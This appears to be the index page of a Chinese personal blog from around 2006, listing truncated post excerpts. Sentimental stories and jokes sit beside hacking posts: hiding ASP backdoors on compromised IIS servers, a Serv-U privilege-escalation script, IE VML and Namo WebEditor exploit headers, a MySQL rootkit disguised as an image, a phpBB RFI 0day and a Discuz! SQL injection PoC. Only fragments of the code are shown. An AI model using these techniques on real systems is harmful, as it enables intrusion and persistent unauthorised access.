有一天，杯子对主人说：“我寂寞，我需要水，给我点水吧。” 主人说：“好吧，拥有了想要的水，你就不寂寞了吗？” 杯子说：“应该是吧。”于是，主人把开水倒进了杯子里。水很热，杯子感到自己快被融化了，杯子想，这就是爱情的力量吧。然后，水变温了，杯子感觉很舒服，杯子想，这就是生活的感觉吧。后来，水变凉了，杯子感到害怕了，怕什么他也不知道，杯子想，这就是失去的滋味吧。慢慢的，水凉透了，杯子绝望了，杯子想，这就是缘分的浏览全文...

10:45 | 评论 (0)

利用iis缺陷配置asp后门

利用iis缺陷配置asp后门由于新的漏洞不断出现，加上一些工具的傻瓜化和某些管理员的不负责任，攻陷一台配置不好的系统已经不是很困难的事情了。但是很多人攻陷了系统之后不知道该如何配置一个好的后门，竟然直接添加hacker之类的系统管理员帐号，视管理员如无物的气魄确实令我等汗颜……然而，到底怎样才能够作一个好的后门呢？现在的杀毒软件，确实越来越厉害，比如诺顿，我看见了就头大。把一些后门先脱壳再加壳当然可以，但是还是有很多人不会，更不用说自己写后门程序了，何况这样也只能浏览全文...

19:22 | 评论 (0)

在asp编程中trim函数的详述及漏洞破解与防护

来源：http://blog.csdn.net/abandonship/archive/2004/10/27/154525.aspx 在asp编程中，我们常常使用trim(rtrim,ltrim)函数去掉一些数据的开头和结尾的空格，笔者最近写了一个asp聊天室，有下面的一段代码：　 <%　dim　name,title　 name=trim(request.form("name"))　 password=trim(request.form("password"))　 if　name=""o 浏览全文...

16:18 | 评论 (0)

seru提权code

前些天格了硬盘，上资料都没备份就OVER了，还要网上还有点。 =============================================================================== <%@ LANGUAGE = VBScript %><% 'Serv-U asp 提权程序'author: Goldsun[at]84823714'DO NOT use it to do evil things! Dim 浏览全文...

22:43 | 评论 (0)

打发日子

这2天,电脑坏了,没天无聊的很,晚上很早就跑到床上看小说去了,一边抱着可爱的熊妹妹,一边看着小说里激烈的气氛,不知不觉就睡着了. 呼呼~呼呼~ 浏览全文...

17:21 | 评论 (0)

Internet Explorer VML Buffer Overflow Download Exec Exploit

/**-----------------------------------------------------------------------** vml.c - Internet Explorer VML Buffer Overflow Download Exec Exploit* !!! 0day !!! Public Version !!!** Copyright (C) 2006 XSec All Rights Reserved.** Author : nop* : nop#xse 浏览全文...

12:34 | 评论 (0)

弱水三千只取一瓢饮

在飞速行驶的列车上，一个老人新买的鞋不小心从窗口掉出了一只。正当周围的旅客为之惋惜时，老人迅速拿起剩下的那只，扔了出去。大家都迷惑不解。只见老人坦然地说：“不管这双鞋多么昂贵，对我来说，剩下一只已毫无用处，还不如把它仍下去，那样拣到它的人能得到一双鞋。” 这个老人就是印度的圣雄甘地。因他的“舍”，不仅使别人得到了一双鞋，也使他自己从中得到了宽慰，得到了轻松和快乐。其实，人的一生就像是一个不断购买新鞋、扔掉那剩下那只鞋的过程。我们只有首先学会放弃，浏览全文...

14:04 | 评论 (0)

lkmysql Version 1.0

lkmysql Version 1.0 ===================== 浏览全文...

10:52 | 评论 (0)

MySqlRootkit

∷ MySqlRootkit - by 剑心 ∷ 这个图片保存到本地，改后缀为php，就可以用了。感谢剑心又让hk简单话了 http://computer.mblogger.cn/upimgs/computer.mblogger.cn/whytt/2006-9/2006_917266.jpg 浏览全文...

21:28 | 评论 (0)

access一个注入点就可以拿到webshell

access一个注入点就可以拿到webshell？在Linzi's blog上看到了，可是没写方法，但我们在access注入中前人说了可以使用的命令不多，就select 和union联合查询，具体我也没试，因为现在这些工具不都是用的selcet来猜吗？如果可以用其他的，我想这些写工具的强人，不会弃易择难吧，好了说到这里到底怎么来拿webshell呢？昨天看了一个动画，忘记是那里下的了，动画貌视在讲怎么通过注入来拿webshell，可是太简单了，而且用是E文，也没多大描述，最后浏览全文...

10:33 | 评论 (0)

javascript:这样的格式引用js文件

whytt问:javascript:这样的格式可以不可以引用js文件 luoluo答：可以，方法应该还不少，举两个简单的1、eval结合XmlHttpRequest，请求脚本文件后eval一下。2、创建dom元素，添加到一个元素下面Codz: <button onclick="java script: var oDiv1 = document.getElementById('div1'); var oScript = document.createElement('script'); 浏览全文...

21:26 | 评论 (0)

phpBB XS 0.58 (RFI) 0day

Vendor: http://www.phpbbxs.eu/ Vulnerable File: includes/functions.php Vulnerable Code: //The phpbb_root_path isn't initialize include_once( $phpbb_root_path . './includes/functions_categories_hierarchy.' . $phpEx ); Method To Use: http://www.victim. 浏览全文...

20:43 | 评论 (0)

bbsxp记

setup.asp中的 sub Log(Message)if Request.ServerVariables("Query_String")<>"" then Query_String="?"&Request.ServerVariables("Query_String")&""Conn.Execute("insert into [BBSXP_Log] (UserName,IPAddress,UserAgent,HttpVerb,PathAndQuery,Re 浏览全文...

19:29 | 评论 (0)

好东西

现在流行X-Forwarded-For注入，其他的也可以搞，下面是对照表，西西。 Accept HTTP_ACCEPT Accept-Charset HTTP_ACCEPT-CHARSET Accept-Encoding HTTP_ACCEPT-ENCODING Accept-Language HTTP_ACCEPT-LANGUAGE Accept-Ranges HTTP_ACCEPT-RANGES Age HTTP_AGE Allo 浏览全文...

13:12 | 评论 (1)

由百度空间存js破坏漏洞想到

百度空间上线后，很多网友为了宣传自己的百度空间，疯狂复制css代码。但与此同时也出现了百度空间的网络黑手,利用百度空间的功能,加入自己的代码,而这些代码又是恶意的,导致百度空间的用户遭遇危险。　　这是一个网友发来的短信求助,原文如下: 　　有个黑客用javascript把我的链接改了..并威胁我如果删除连接就删除我的空间,最怕的就是这样的人..我想问您了解一下他能用同样的手段篡改我页面的其他信息吗..最好能告诉小弟对付这样的人的办法,我实在没辙了,好郁闷..谢谢.. 　　当时笔者找到该" 浏览全文...

18:40 | 评论 (0)

郁闷男女的区别是什么

漂亮吗？？浏览全文...

12:17 | 评论 (1)

Namo WebEditor 5 Long Filename Buffer Overflow Exploit

/* * Namo WebEditor 5 Long Filename Buffer Overflow Exploit * dicovered by : trackerx90,thongchai sangsawang * e-mail trackerx90@hotmail.com> * * example: * * Microsoft Windows XP [Version 5.1.2600] * (C) Copyright 1985-2001 Microsoft Corp. * * C:\>n 浏览全文...

10:03 | 评论 (1)

这辈子我们还能在一起吗

这首歌的时候感觉很舒服。今夜的星空如此美丽也许是因为你在我身边所有美好记忆浮现在我的眼前我依然对你那么依恋好想把你拥在怀里去海边看那流星许下心愿就让我这份真情再次融化你我那颗受伤又冰冻的心从此而改变我已经变老了也已经变好了我们这辈子还能在一起吗我只是不愿意让爱再等待就让我的爱意温暖你的情怀你还是那么美丽你还是那么美丽我们也曾誓言今生要一起你是否还愿意与我牵手相依走过生命剩下的点点滴滴浏览全文...

20:54 | 评论 (0)

本地提权的

-- Advisory Name -- Default Screen Saver Vulnerability in Microsoft Windows -- Author -- Susam Pal -- Vulnerable Systems -- Windows XP, Windows 2003 Server -- Vulnerability Description -- This vulnerability has been tested on Windows XP 浏览全文...

10:19 | 评论 (1)

Discuz! 5.0.0 RC1 SQL injection PoC

#!/usr/bin/python# Discuz! 5.0.0 RC1 SQL injection PoC# Author: wofeiwo thx superheis help# Date: Aug 12th 2006import sys import httplibfrom urlparse import urlparsefrom time import sleepdef injection (lenthofpass, realurl, path): sys.stdo 浏览全文...

10:18 | 评论 (0)

htmlencode过滤变量不足的分析报告

====废话==== 本文是看了华仔的BBSXP的loading.asp的forumid变量过滤不足后写的总结报告.====内容==== 让我们先来看BBSXP的loading.asp的代码吧---------------------------------------cut-----------------------------------1 2 <%3 id=int(Reque 浏览全文...

9:47 | 评论 (0)

我跑去做鸭了

我今天第一次去做鸭子，现在把难忘经历告诉大家！！　　人家说：“像我这长相的男人不应该做鸭子的。”　　我长的不是很帅，身高也没什么优势，脸上没什么沧桑感，没有成熟男人的气质，更不是让女人一看到就有安全感的男人。不过我想，既然女人可以做鸡，男人为什么不可以做鸭子呢？！并不是没钱我才去做鸭子的，我只是想体验一下不一样的生活，为自己的人生增加一点新的色彩。所以今照下班以后，我去了那个地方。经过老板的热情介绍，我终于找到了合适的对象。她一个人静悄悄的在角落里，皮肤很白，估计是南浏览全文...

9:28 | 评论 (0)

闲聊群里真情对白

发现spark的话，说的很有道理，不转对不起自己，哈哈~ s ρ aг κ(1383058) 19:43:26可现在的女大学生们呢？校外同居，流产堕胎，拜金纵欲，所谓的上大学无非是为了将来嫁个有钱人而镀层金而已。再说了，现在大学扩招了，啥人都能进了，原来本属于“社会女青年”的那伙儿的也混了进去，做出这样的事儿来也不足为奇，只是“女大学生”这个曾经神圣的名字现在在中国算是毁在了这批80女们手上了。 J.Y(22 浏览全文...

20:03 | 评论 (0)

感人MTV感言

在一个落叶分飞的季节里，男人和女人偶然的相遇了，后女人成了男人的模特，男人最爱的运动是赛车，他们一起赛车一起庆祝，一起开心，一次意外女人眼睛受伤了，男人苦痛不以，男人决定了，男人去赛了人生中最后一次车，将自己所有的相片都带走了，女人康复了，女人知道男人离去了，但女人不知道男人为什么选者离去，女人很伤心，当女人来到曾经和男人一起到过的赛车场，在远处女人看到了男人，男人静静的坐在那里，戴着墨镜，身旁一条狗狗，女人来到男人身边，此时一阵风将男人身旁的照片吹落地，女人拾起看着相片浏览全文...

13:14 | 评论 (0)

搞笑不要这样吸

今天天气好热，就去买冰激凌吃来到小士多冰柜旁，这时！突然从我身后冲来3个LOLI。吵着要我买冰激凌给她们吃无奈...只好买啦，可她们到好……都选1元的冰激凌。啊啊啊啊～怎么不选5毛的..55555555我的钱啊～～搞的我自己剩下的钱，只能买5毛的冰棍而已啊T_T 大家找了个地方坐下看着大家都1元冰激凌，我才5毛……心中超级不爽～～得找个机会捞回点本才行由于天气很热，冰激凌很快就融的滴了下来。刚好滴在了LOLI的大腿上（LOLI们穿短裙的）浏览全文...

12:45 | 评论 (0)

公告

文章分类

档案

随笔分类

世外源地

常逛网站

无心呢喃

蝴蝶飞飞